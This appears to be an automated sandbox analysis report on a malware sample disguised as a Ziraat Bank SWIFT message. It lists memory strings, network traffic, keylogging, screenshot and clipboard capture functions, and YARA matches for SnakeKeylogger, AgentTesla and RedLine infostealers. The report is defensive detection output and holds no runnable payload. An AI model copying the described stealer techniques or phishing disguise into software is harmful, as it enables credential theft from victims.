Source: powershell.exe, 0000000F.00000002.1370958443.0000000005819000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000F.00000002.1370958443.0000000005819000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000F.00000002.1366121980.0000000004906000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000F.00000002.1370958443.0000000005819000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: server02.exe, 0000000C.00000002.3712810154.00000000028EE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: svchost.exe, 00000005.00000002.1302736160.000000000704E000.00000004.00000800.00020000.00000000.sdmp, server02.exe, 0000000C.00000002.3712810154.00000000028EE000.00000004.00000800.00020000.00000000.sdmp, server02.exe, 0000000C.00000000.1292636248.0000000000532000.00000002.00000001.01000000.0000000A.sdmp, svchost.exe, 00000022.00000002.1580669736.000000000734E000.00000004.00000800.00020000.00000000.sdmp, server02.exe.5.dr	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: server02.exe, 0000000C.00000002.3712810154.00000000028EE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.228d
Source: server02.exe, 0000000C.00000002.3712810154.00000000028EE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.228l

Source: unknown	Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49702

Source: unknown

HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.7:49702 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to capture screen (.Net source)

Source: server02.exe.5.dr, UltraSpeed.cs

.Net Code: TakeScreenshot

Contains functionality to log keystrokes (.Net Source)

Source: server02.exe.5.dr, UltraSpeed.cs	.Net Code: VKCodeToUnicode
Source: 5.2.svchost.exe.6f05570.4.raw.unpack, cPKWk.cs	.Net Code: I3Mi2zn6x
Source: 5.2.svchost.exe.6f42790.6.raw.unpack, cPKWk.cs	.Net Code: I3Mi2zn6x

Installs a global keyboard hook

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe

Windows user hook set: 0 keyboard low level C:\Users\user~1\AppData\Local\Temp\neworigin.exe

Jump to behavior

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe

Code function: 0_2_000D6B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_000D6B0C

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Code function: 0_2_000D6D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,		0_2_000D6D07
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Code function: 2_2_00916D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,		2_2_00916D07

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe

0_2_000D6B0C

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe

Code function: 0_2_0009B63C GetCursorPos,ScreenToClient,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetWindowLongW,

0_2_0009B63C

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Window created: window name: CLIPBRDWNDCLASS			Jump to behavior
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Window created: window name: CLIPBRDWNDCLASS

System Summary

Malicious sample detected (through community Yara rule)

Source: 12.0.server02.exe.530000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 12.0.server02.exe.530000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 33.2.spadixes.exe.35a0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 5.2.svchost.exe.6f05570.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 2.2.spadixes.exe.3cc0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 5.2.svchost.exe.6f42790.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 34.2.svchost.exe.73bfdf0.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 34.2.svchost.exe.73bfdf0.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 5.2.svchost.exe.70bfdf0.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 5.2.svchost.exe.70bfdf0.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 5.2.svchost.exe.70bfdf0.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 5.2.svchost.exe.70bfdf0.7.raw.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 5.2.svchost.exe.70bfdf0.7.raw.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 5.2.svchost.exe.6f42790.6.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 13.0.neworigin.exe.2f0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 34.2.svchost.exe.73873c0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 26.2.spadixes.exe.3f20000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 31.2.spadixes.exe.39e0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 5.2.svchost.exe.6f05570.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 5.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 34.2.svchost.exe.73f8810.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 34.2.svchost.exe.73f8810.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 29.2.spadixes.exe.3680000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 34.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 34.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 5.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 5.2.svchost.exe.70f8810.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 5.2.svchost.exe.70f8810.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 5.2.svchost.exe.70f8810.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 5.2.svchost.exe.70f8810.5.raw.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 5.2.svchost.exe.70f8810.5.raw.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 5.2.svchost.exe.70873c0.8.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 5.2.svchost.exe.70873c0.8.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 5.2.svchost.exe.70873c0.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 5.2.svchost.exe.70873c0.8.raw.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 5.2.svchost.exe.70873c0.8.raw.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 00000002.00000002.1285293466.0000000003CC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000005.00000002.1295590843.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0000001A.00000002.1427486186.0000000003F20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0000000C.00000000.1292636248.0000000000532000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000005.00000002.1302736160.000000000704E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 00000005.00000002.1302736160.000000000704E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000005.00000002.1302736160.000000000704E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 0000001D.00000002.1441006965.0000000003680000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000022.00000002.1574359559.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000022.00000002.1580669736.000000000734E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000021.00000002.1489110172.00000000035A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0000001F.00000002.1452830281.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: Process Memory Space: svchost.exe PID: 5088, type: MEMORYSTR	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: Process Memory Space: svchost.exe PID: 5088, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: server02.exe PID: 6012, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: svchost.exe PID: 7848, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\server02.exe, type: DROPPED	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\server02.exe, type: DROPPED	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen

.NET source code contains very large strings

Source: TrojanAI.exe.5.dr, opqcmgIPmeabY.cs	Long String: Length: 17605
Source: 5.2.svchost.exe.70bfdf0.7.raw.unpack, opqcmgIPmeabY.cs	Long String: Length: 17605

Binary is likely a compiled AutoIt script file

Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe, 00000000.00000003.1258915970.000000000372D000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_9210698e-8
Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe, 00000000.00000003.1258915970.000000000372D000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_1a330727-1
Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe, 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_249774e2-3
Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe, 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_4483da7b-5
Source: spadixes.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: spadixes.exe, 00000002.00000000.1259354287.000000000096E000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_ae132cc0-d
Source: spadixes.exe, 00000002.00000000.1259354287.000000000096E000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_a977ed07-2
Source: spadixes.exe, 0000001A.00000000.1403011029.000000000096E000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_ecf8af26-9
Source: spadixes.exe, 0000001A.00000000.1403011029.000000000096E000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_606eacde-9
Source: spadixes.exe, 0000001D.00000000.1425187662.000000000096E000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_ecfa8aac-9
Source: spadixes.exe, 0000001D.00000000.1425187662.000000000096E000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_4d4f745f-d
Source: spadixes.exe, 0000001F.00000000.1438617307.000000000096E000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_f7cdfe7c-2
Source: spadixes.exe, 0000001F.00000000.1438617307.000000000096E000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_a37eb242-8
Source: spadixes.exe, 00000021.00000002.1484524878.000000000096E000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_ecb5bc79-d
Source: spadixes.exe, 00000021.00000002.1484524878.000000000096E000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_1accc157-0
Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_d0b4b338-1
Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	String found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_6fca400a-f
Source: spadixes.exe.0.dr	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_372e7f09-c
Source: spadixes.exe.0.dr	String found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_68937fad-8
Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.34.dr	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_6e04fe41-f
Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.34.dr	String found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_b55f9d34-3

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe

Code function: 0_2_000CD0B8: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,

0_2_000CD0B8

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe

Code function: 0_2_000BACC5 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_000BACC5

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Code function: 0_2_000C79D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		0_2_000C79D3
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Code function: 2_2_009079D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		2_2_009079D3

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Code function: 0_2_000AB043	0_2_000AB043
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Code function: 0_2_0009335A	0_2_0009335A
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Code function: 0_2_000B410F	0_2_000B410F
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Code function: 0_2_0009B11F	0_2_0009B11F
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Code function: 0_2_000AD1B9	0_2_000AD1B9
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Code function: 0_2_000A123A	0_2_000A123A
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Code function: 0_2_000B724D	0_2_000B724D
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Code function: 0_2_000A02A4	0_2_000A02A4
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Code function: 0_2_000B038E	0_2_000B038E
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Code function: 0_2_0008E3B0	0_2_0008E3B0
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Code function: 0_2_000C13CA	0_2_000C13CA
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Code function: 0_2_000893F0	0_2_000893F0
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Code function: 0_2_0009F563	0_2_0009F563
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Code function: 0_2_000B467F	0_2_000B467F
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Code function: 0_2_000CB6CC	0_2_000CB6CC
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Code function: 0_2_000896C0	0_2_000896C0
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Code function: 0_2_000A06D9	0_2_000A06D9
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Code function: 0_2_0009FA57	0_2_0009FA57
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Code function: 0_2_000EAACE	0_2_000EAACE
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Code function: 0_2_00093B70	0_2_00093B70
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Code function: 0_2_000B4BEF	0_2_000B4BEF
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Code function: 0_2_0009FE6F	0_2_0009FE6F
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Code function: 0_2_000A9ED0	0_2_000A9ED0
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Code function: 0_2_00086F07	0_2_00086F07
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Code function: 0_2_0008AF50	0_2_0008AF50
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Code function: 0_2_00E43080	0_2_00E43080
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Code function: 2_2_008EB043	2_2_008EB043
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Code function: 2_2_008D335A	2_2_008D335A
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Code function: 2_2_008ED1B9	2_2_008ED1B9
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Code function: 2_2_008F410F	2_2_008F410F
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Code function: 2_2_008DB11F	2_2_008DB11F
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Code function: 2_2_008E02A4	2_2_008E02A4
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Code function: 2_2_008E123A	2_2_008E123A
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Code function: 2_2_008F724D	2_2_008F724D
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Code function: 2_2_008F038E	2_2_008F038E
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Code function: 2_2_008CE3B0	2_2_008CE3B0
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Code function: 2_2_009013CA	2_2_009013CA
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Code function: 2_2_008C93F0	2_2_008C93F0
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Code function: 2_2_008DF563	2_2_008DF563
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Code function: 2_2_008C96C0	2_2_008C96C0
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Code function: 2_2_008E06D9	2_2_008E06D9
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Code function: 2_2_0090B6CC	2_2_0090B6CC
